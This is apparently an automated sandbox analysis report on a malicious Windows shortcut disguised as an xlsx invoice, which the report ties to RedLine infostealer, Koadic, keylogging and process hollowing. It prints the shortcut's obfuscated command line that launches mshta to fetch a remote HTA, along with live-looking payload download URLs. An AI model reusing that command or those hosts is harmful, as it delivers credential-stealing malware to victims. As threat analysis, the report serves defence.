Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0o
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: uc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.dr	String found in binary or memory: http://www.pmail.com
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/_
Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/downlo
Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sessosesso.it
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it
Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx
Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep
Source: mshta.exe, 00000009.00000002.1865747161.000001A2C9C00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...
Source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...-
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta1
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta5
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288
Source: FT. 40FE CNY .xlsx.lnk	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaC:
Source: mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaDe
Source: mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaH
Source: mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaLMEMX
Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaU
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta_
Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaindows
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y2
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com:443/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif

Creates a window with clipboard capturing capabilities

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS

Potential key logger detected (key state polling based)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D67A03 GetKeyState,GetKeyState,GetKeyState,		23_2_41D67A03
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D67A08 GetKeyState,GetKeyState,GetKeyState,		23_2_41D67A08

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7800.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://www.sessosesso.it/assets/aw/yt.htaAC:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\uc.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: FT. 40FE CNY .xlsx.lnk

LNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	19_2_0299C3F8
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	19_2_0299C368
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	19_2_0299C4DC
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	19_2_02997AC0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	19_2_02997968
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_02997F48
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	19_2_0299C3F6
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	19_2_02997966
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_02997F46
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	24_2_028BC4DC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	24_2_028B7AC0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_028B7968
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_028B7F48
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_028BC3F8
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_028BC3F6
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	24_2_028BC368
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_028B7966
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_028B7F46

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,

19_2_0299CA6C

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAB970E65	15_2_00007FFAAB970E65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB955F80	17_2_00007FFAAB955F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB9834B8	17_2_00007FFAAB9834B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BC90	17_2_00007FFAAB95BC90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BC35	17_2_00007FFAAB95BC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BB3B	17_2_00007FFAAB95BB3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95E318	17_2_00007FFAAB95E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BA99	17_2_00007FFAAB95BA99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95DFE0	17_2_00007FFAAB95DFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB96CEA0	17_2_00007FFAAB96CEA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2362E	17_2_00007FFAABA2362E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA232A0	17_2_00007FFAABA232A0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029820C4	19_2_029820C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00408C60	23_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040DC11	23_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00407C3F	23_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418CCC	23_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00406CA0	23_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004028B0	23_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0041A4BE	23_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418244	23_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00401650	23_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402F20	23_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004193C4	23_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418788	23_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402F89	23_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402B90	23_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004073A0	23_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_3D941030	23_2_3D941030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_3D941020	23_2_3D941020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B99A0	23_2_411B99A0
